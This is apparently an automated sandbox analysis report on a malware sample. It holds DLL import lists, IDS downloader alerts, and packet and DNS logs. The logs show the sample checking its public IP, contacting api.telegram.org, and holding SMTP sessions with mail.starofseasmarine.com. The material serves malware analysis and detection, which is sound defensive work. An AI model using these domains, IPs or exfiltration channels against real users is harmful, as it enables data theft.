                                      ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                      OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishGreat Britain
                                      EnglishUnited States
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-10-04T10:32:02.402512+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730158.101.44.24280TCP
                                      2024-10-04T10:32:03.746273+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730158.101.44.24280TCP
                                      2024-10-04T10:32:04.314897+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449732188.114.97.3443TCP
                                      2024-10-04T10:32:05.965066+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449733158.101.44.24280TCP
                                      2024-10-04T10:32:12.896170+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449742188.114.97.3443TCP
                                      2024-10-04T10:32:15.379669+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449746188.114.97.3443TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 4, 2024 10:32:01.346090078 CEST4973080192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:01.351062059 CEST8049730158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:01.351473093 CEST4973080192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:01.351697922 CEST4973080192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:01.357176065 CEST8049730158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:02.099112034 CEST8049730158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:02.152585030 CEST4973080192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:02.153947115 CEST4973080192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:02.159940958 CEST8049730158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:02.358464003 CEST8049730158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:02.402512074 CEST4973080192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:02.569880009 CEST49731443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:02.569902897 CEST44349731188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:02.569999933 CEST49731443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:02.581952095 CEST49731443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:02.581973076 CEST44349731188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:03.054511070 CEST44349731188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:03.054604053 CEST49731443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:03.060136080 CEST49731443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:03.060142994 CEST44349731188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:03.060686111 CEST44349731188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:03.105873108 CEST49731443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:03.147336960 CEST49731443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:03.191396952 CEST44349731188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:03.255112886 CEST44349731188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:03.255217075 CEST44349731188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:03.255295992 CEST49731443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:03.260379076 CEST49731443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:03.263263941 CEST4973080192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:03.270342112 CEST8049730158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:03.694257975 CEST8049730158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:03.696728945 CEST49732443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:03.696773052 CEST44349732188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:03.696873903 CEST49732443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:03.697119951 CEST49732443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:03.697135925 CEST44349732188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:03.746273041 CEST4973080192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:04.168654919 CEST44349732188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:04.170387030 CEST49732443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:04.170418978 CEST44349732188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:04.314932108 CEST44349732188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:04.315156937 CEST44349732188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:04.315227985 CEST49732443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:04.315562010 CEST49732443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:04.318567991 CEST4973080192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:04.319808960 CEST4973380192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:04.324915886 CEST8049733158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:04.324975967 CEST4973380192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:04.325052023 CEST4973380192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:04.325373888 CEST8049730158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:04.325428963 CEST4973080192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:04.330197096 CEST8049733158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:05.920310974 CEST8049733158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:05.921890020 CEST49734443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:05.921917915 CEST44349734188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:05.922003031 CEST49734443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:05.922353029 CEST49734443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:05.922363997 CEST44349734188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:05.965065956 CEST4973380192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:06.382280111 CEST44349734188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:06.384782076 CEST49734443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:06.384804010 CEST44349734188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:06.505441904 CEST44349734188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:06.505680084 CEST44349734188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:06.505765915 CEST49734443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:06.506273031 CEST49734443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:06.512051105 CEST4973580192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:06.517090082 CEST8049735158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:06.517220020 CEST4973580192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:06.517360926 CEST4973580192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:06.522419930 CEST8049735158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:08.534051895 CEST8049735158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:08.535299063 CEST49736443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:08.535324097 CEST44349736188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:08.535423040 CEST49736443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:08.535638094 CEST49736443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:08.535644054 CEST44349736188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:08.574435949 CEST4973580192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:09.011838913 CEST44349736188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:09.013786077 CEST49736443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:09.013803005 CEST44349736188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:09.149908066 CEST44349736188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:09.150140047 CEST44349736188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:09.150223017 CEST49736443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:09.150623083 CEST49736443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:09.153951883 CEST4973580192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:09.155153990 CEST4973780192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:09.160531998 CEST8049737158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:09.160599947 CEST4973780192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:09.160677910 CEST4973780192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:09.161089897 CEST8049735158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:09.161138058 CEST4973580192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:09.166209936 CEST8049737158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:09.929642916 CEST8049737158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:09.931119919 CEST49738443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:09.931162119 CEST44349738188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:09.931237936 CEST49738443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:09.931473970 CEST49738443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:09.931479931 CEST44349738188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:09.980961084 CEST4973780192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:10.396425009 CEST44349738188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:10.397989035 CEST49738443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:10.398015022 CEST44349738188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:10.537707090 CEST44349738188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:10.537842989 CEST44349738188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:10.537945032 CEST49738443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:10.538301945 CEST49738443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:10.541116953 CEST4973780192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:10.542063951 CEST4973980192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:10.546703100 CEST8049737158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:10.546756983 CEST4973780192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:10.547152996 CEST8049739158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:10.547224998 CEST4973980192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:10.547310114 CEST4973980192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:10.552382946 CEST8049739158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:11.111496925 CEST8049739158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:11.112898111 CEST49740443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:11.112961054 CEST44349740188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:11.113051891 CEST49740443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:11.113317013 CEST49740443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:11.113339901 CEST44349740188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:11.152556896 CEST4973980192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:11.586780071 CEST44349740188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:11.588373899 CEST49740443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:11.588448048 CEST44349740188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:11.710479021 CEST44349740188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:11.710668087 CEST44349740188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:11.710768938 CEST49740443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:11.711158037 CEST49740443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:11.714494944 CEST4973980192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:11.715250969 CEST4974180192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:11.719599009 CEST8049739158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:11.719929934 CEST4973980192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:11.720199108 CEST8049741158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:11.720283985 CEST4974180192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:11.722376108 CEST4974180192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:11.727437973 CEST8049741158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:12.303060055 CEST8049741158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:12.304359913 CEST49742443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:12.304399014 CEST44349742188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:12.304656982 CEST49742443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:12.304722071 CEST49742443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:12.304730892 CEST44349742188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:12.355812073 CEST4974180192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:12.768939018 CEST44349742188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:12.773619890 CEST49742443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:12.773649931 CEST44349742188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:12.896205902 CEST44349742188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:12.896408081 CEST44349742188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:12.896482944 CEST49742443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:12.897053957 CEST49742443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:12.899802923 CEST4974180192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:12.900901079 CEST4974380192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:12.906070948 CEST8049741158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:12.906142950 CEST4974180192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:12.907315969 CEST8049743158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:12.907387018 CEST4974380192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:12.907454967 CEST4974380192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:12.914290905 CEST8049743158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:13.489728928 CEST8049743158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:13.490940094 CEST49744443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:13.490977049 CEST44349744188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:13.491071939 CEST49744443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:13.491286039 CEST49744443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:13.491302013 CEST44349744188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:13.543297052 CEST4974380192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:13.983345032 CEST44349744188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:13.985651970 CEST49744443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:13.985672951 CEST44349744188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:14.119738102 CEST44349744188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:14.119949102 CEST44349744188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:14.120002031 CEST49744443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:14.120320082 CEST49744443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:14.125041008 CEST4974380192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:14.126379967 CEST4974580192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:14.130728960 CEST8049743158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:14.130850077 CEST4974380192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:14.131730080 CEST8049745158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:14.131879091 CEST4974580192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:14.131958961 CEST4974580192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:14.137094975 CEST8049745158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:14.737889051 CEST8049745158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:14.738977909 CEST49746443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:14.739032030 CEST44349746188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:14.739128113 CEST49746443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:14.739351988 CEST49746443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:14.739367008 CEST44349746188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:14.798943996 CEST4974580192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:15.231250048 CEST44349746188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:15.246306896 CEST49746443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:15.246344090 CEST44349746188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:15.379739046 CEST44349746188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:15.379976034 CEST44349746188.114.97.3192.168.2.4
                                      Oct 4, 2024 10:32:15.380127907 CEST49746443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:15.380774975 CEST49746443192.168.2.4188.114.97.3
                                      Oct 4, 2024 10:32:15.450783014 CEST4974580192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:15.456012011 CEST8049745158.101.44.242192.168.2.4
                                      Oct 4, 2024 10:32:15.456078053 CEST4974580192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:15.462898016 CEST49748443192.168.2.4149.154.167.220
                                      Oct 4, 2024 10:32:15.462932110 CEST44349748149.154.167.220192.168.2.4
                                      Oct 4, 2024 10:32:15.464209080 CEST49748443192.168.2.4149.154.167.220
                                      Oct 4, 2024 10:32:15.467673063 CEST49748443192.168.2.4149.154.167.220
                                      Oct 4, 2024 10:32:15.467684984 CEST44349748149.154.167.220192.168.2.4
                                      Oct 4, 2024 10:32:16.111255884 CEST44349748149.154.167.220192.168.2.4
                                      Oct 4, 2024 10:32:16.111418009 CEST49748443192.168.2.4149.154.167.220
                                      Oct 4, 2024 10:32:16.113379955 CEST49748443192.168.2.4149.154.167.220
                                      Oct 4, 2024 10:32:16.113390923 CEST44349748149.154.167.220192.168.2.4
                                      Oct 4, 2024 10:32:16.113715887 CEST44349748149.154.167.220192.168.2.4
                                      Oct 4, 2024 10:32:16.115457058 CEST49748443192.168.2.4149.154.167.220
                                      Oct 4, 2024 10:32:16.163407087 CEST44349748149.154.167.220192.168.2.4
                                      Oct 4, 2024 10:32:16.357013941 CEST44349748149.154.167.220192.168.2.4
                                      Oct 4, 2024 10:32:16.357197046 CEST44349748149.154.167.220192.168.2.4
                                      Oct 4, 2024 10:32:16.357284069 CEST49748443192.168.2.4149.154.167.220
                                      Oct 4, 2024 10:32:16.361783028 CEST49748443192.168.2.4149.154.167.220
                                      Oct 4, 2024 10:32:21.671844006 CEST4973380192.168.2.4158.101.44.242
                                      Oct 4, 2024 10:32:21.866468906 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:32:21.871412039 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:21.871515989 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:32:23.039237022 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:23.039473057 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:32:23.045345068 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:23.359945059 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:23.364348888 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:32:23.369358063 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:23.685550928 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:23.686842918 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:32:23.691996098 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:24.014652014 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:24.014751911 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:24.014758110 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:24.014833927 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:32:24.015028954 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:24.015033960 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:24.015089989 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:32:24.016062975 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:24.016148090 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:24.016196012 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:32:24.052795887 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:32:24.059151888 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:24.376574039 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:24.395364046 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:32:24.401038885 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:24.716002941 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:24.717704058 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:32:24.722675085 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:25.040915012 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:25.041243076 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:32:25.046416998 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:26.367683887 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:26.367988110 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:32:26.375116110 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:26.688458920 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:26.694612026 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:32:26.699548960 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:27.050030947 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:27.050242901 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:32:27.055875063 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:27.371288061 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:27.372142076 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:32:27.372210026 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:32:27.372236013 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:32:27.372257948 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:32:27.377566099 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:27.377578974 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:27.377590895 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:27.377772093 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:43.635023117 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:32:43.683974028 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:34:01.871828079 CEST49754587192.168.2.4166.62.28.135
                                      Oct 4, 2024 10:34:01.879548073 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:34:02.197261095 CEST58749754166.62.28.135192.168.2.4
                                      Oct 4, 2024 10:34:02.200342894 CEST49754587192.168.2.4166.62.28.135
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 4, 2024 10:32:01.331360102 CEST5598853192.168.2.41.1.1.1
                                      Oct 4, 2024 10:32:01.338762999 CEST53559881.1.1.1192.168.2.4
                                      Oct 4, 2024 10:32:02.555692911 CEST6397953192.168.2.41.1.1.1
                                      Oct 4, 2024 10:32:02.568803072 CEST53639791.1.1.1192.168.2.4
                                      Oct 4, 2024 10:32:15.450340033 CEST6111353192.168.2.41.1.1.1
                                      Oct 4, 2024 10:32:15.457340002 CEST53611131.1.1.1192.168.2.4
                                      Oct 4, 2024 10:32:21.850533009 CEST5548653192.168.2.41.1.1.1
                                      Oct 4, 2024 10:32:21.864156008 CEST53554861.1.1.1192.168.2.4
                                      Oct 4, 2024 10:32:30.192007065 CEST5364037162.159.36.2192.168.2.4
                                      Oct 4, 2024 10:32:30.670299053 CEST5947953192.168.2.41.1.1.1
                                      Oct 4, 2024 10:32:30.677309990 CEST53594791.1.1.1192.168.2.4
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Oct 4, 2024 10:32:01.331360102 CEST192.168.2.41.1.1.10x9d1Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                      Oct 4, 2024 10:32:02.555692911 CEST192.168.2.41.1.1.10xd26aStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                      Oct 4, 2024 10:32:15.450340033 CEST192.168.2.41.1.1.10xe224Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                      Oct 4, 2024 10:32:21.850533009 CEST192.168.2.41.1.1.10x287aStandard query (0)mail.starofseasmarine.comA (IP address)IN (0x0001)false
                                      Oct 4, 2024 10:32:30.670299053 CEST192.168.2.41.1.1.10x7c72Standard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Oct 4, 2024 10:32:01.338762999 CEST1.1.1.1192.168.2.40x9d1No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                      Oct 4, 2024 10:32:01.338762999 CEST1.1.1.1192.168.2.40x9d1No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                      Oct 4, 2024 10:32:01.338762999 CEST1.1.1.1192.168.2.40x9d1No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                      Oct 4, 2024 10:32:01.338762999 CEST1.1.1.1192.168.2.40x9d1No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                      Oct 4, 2024 10:32:01.338762999 CEST1.1.1.1192.168.2.40x9d1No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                      Oct 4, 2024 10:32:01.338762999 CEST1.1.1.1192.168.2.40x9d1No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                      Oct 4, 2024 10:32:02.568803072 CEST1.1.1.1192.168.2.40xd26aNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                      Oct 4, 2024 10:32:02.568803072 CEST1.1.1.1192.168.2.40xd26aNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                      Oct 4, 2024 10:32:15.457340002 CEST1.1.1.1192.168.2.40xe224No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                      Oct 4, 2024 10:32:21.864156008 CEST1.1.1.1192.168.2.40x287aNo error (0)mail.starofseasmarine.com166.62.28.135A (IP address)IN (0x0001)false
                                      Oct 4, 2024 10:32:30.677309990 CEST1.1.1.1192.168.2.40x7c72Name error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                      • reallyfreegeoip.org
                                      • api.telegram.org
                                      • checkip.dyndns.org
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449730158.101.44.242807456C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 4, 2024 10:32:01.351697922 CEST151OUTGET / HTTP/1.1
